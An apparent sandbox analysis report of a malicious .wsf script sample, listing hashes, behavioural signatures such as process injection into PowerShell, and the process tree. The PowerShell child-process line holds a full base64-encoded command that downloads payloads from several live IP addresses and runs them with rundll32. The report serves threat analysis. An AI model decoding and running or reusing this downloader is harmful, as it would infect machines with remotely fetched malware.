Analysis
max time kernel: 27s
max time network: 30s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 11/04/2023, 16:33
Static task: static1
Behavioral task: behavioral1
  Sample: dp_December.26(58288).wsf
  Resource: win7-20230220-en
Behavioral task: behavioral2
  Sample: dp_December.26(58288).wsf
  Resource: win10v2004-20230221-en
General
Target: dp_December.26(58288).wsf
Size: 186KB
MD5: 5390aaf6fac0b4c448b30285979fe9c2
SHA1: 05fc56ff3d86ed4944e378ac79ffadc75208a16c
SHA256: 742fc41f10c15a25a4a4f597ad5929c8b342039b20aef6ea9e27e324932e995a
SHA512: 475913de3df236bf04bc0037876f25d77dd0c8606337fd22119bf419b55b8c15244af35f4aab1ec70c920055d01c781d04c4ddb62e55bd243aa694a9699a394e
SSDEEP: 3072:XSKbnv6Ypi/5IBwdlSi0xtfsq0AwZEdO8Rl+ew+H9w/+MGZSswSF:Jbv6asIBwdlSiUtfsqRdvvpw+H9w/ZGn
Malware Config
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid 1584, process powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description: Token: SeDebugPrivilege; pid 1584; process powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  description                         | pid  | Process     | procid_target
  PID 1212 wrote to memory of 1584    | 1212 | WScript.exe | 28
  PID 1212 wrote to memory of 1584    | 1212 | WScript.exe | 28
  PID 1212 wrote to memory of 1584    | 1212 | WScript.exe | 28
Processes
- C:\Windows\System32\WScript.exe (depth 1)
  command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dp_December.26(58288).wsf"
  signatures: Suspicious use of WriteProcessMemory
  PID: 1212
  child process (depth 2):
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQAUABlAGMAawBlAHIAdwBvAG8AZABHAGEAbAB1AG0AcABoAGUAZAAgAD0AIAAoACIAaAB0AHQAcAA6AC8ALwA4ADcALgAyADMANgAuADEANAA2AC4AMwA0AC8ANABCAEkAbgBOAHYAeABNAFkAcQBUAGsALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADIAMgAxAC4AMQAyADQALwA1AGMAWgA2AGMAeQBPAFAAZwBNAC4AZABhAHQALABoAHQAdABwADoALwAvADEANAA5AC4AMQAwADIALgAyADQAMwAuADIAMAA0AC8ANQBTADQATgBCADcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4AMQA1ADkALgAyADQAOQAuADMAMwAvAE4AQgB2AGcAbQBRAG4ANwBqAE0ALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgA2AC4AMgA0ADgALgAxADgANwAvADkATgBoAEYAWQBjAHEALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANQAxAC4AMgAyADIALgAxADkAOQAuADIANAA0AC8AdQBuAGIANABTAEEAUABsAEMAMQAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFcAaQBkAGUAcgBzAGgAaQBuAHMAQQBsAHQAbwBjAHUAbQB1AGwAdQBzACAAaQBuACAAJABQAGUAYwBrAGUAcgB3AG8AbwBkAEcAYQBsAHUAbQBwAGgAZQBkACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABXAGkAZABlAHIAcwBoAGkAbgBzAEEAbAB0AG8AYwB1AG0AdQBsAHUAcwAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANQAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAYQBsAGsAYQBtAGkAbgBlAFUAbgBkAHIAZQBhAGQAaQBuAGcALgBVAG4AYwBpAHQAZQBEAGkAZQBnAHUAZQBuAG8AOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAAXABhAGwAawBhAG0AaQBuAGUAVQBuAGQAcgBlAGEAZABpAG4AZwAuAFUAbgBjAGkAdABlAEQAaQBlAGcAdQBlAG4AbwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABhAGwAawBhAG0AaQBuAGUAVQBuAGQAcgBlAGEAZABpAG4AZwAuAFUAbgBjAGkAdABlAEQAaQBlAGcAdQBlAG4AbwAsAE4AaQBrAG4AOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAfQB9AA=="2⤵
  signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  PID: 1584